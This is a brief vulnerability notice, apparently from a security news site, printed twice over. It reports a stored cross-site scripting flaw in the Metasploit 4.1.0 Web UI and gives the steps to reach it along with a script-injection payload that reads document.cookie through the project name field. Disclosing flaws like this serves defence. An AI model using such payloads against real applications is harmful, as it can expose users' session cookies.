Metasploit 4.1.0 Web UI Cross Site Scripting vulnerability
![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)
The Web UI in Metasploit version 4.1.0 suffers from a stored cross site scripting vulnerability discovered by "Stefan Schurtz".
Technical Details
Login to Web UI -> Create New Project -> Project name -> '"</script><script>alert(document.cookie)</script>
![The Hacker News](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEVRE21zfPoEkwM9AqzQqXfOBpRI3hfRA-AjhlJprt9MjEX6bpwyFywf_cSLg0xSNUYazAPhXsQs4Pa7FWgoOS6VnLyCgwh65T9QeUoUPrlXx9p4On9Rp64i19xENKtrGZv2O5A5qsg4Gm/s640/Metasploit-Community-Edition_1.png)
The Web UI in Metasploit version 4.1.0 suffers from a stored cross site scripting vulnerability discovered by "Stefan Schurtz".
Technical Details
Login to Web UI -> Create New Project -> Project name -> '"</script><script>alert(document.cookie)</script>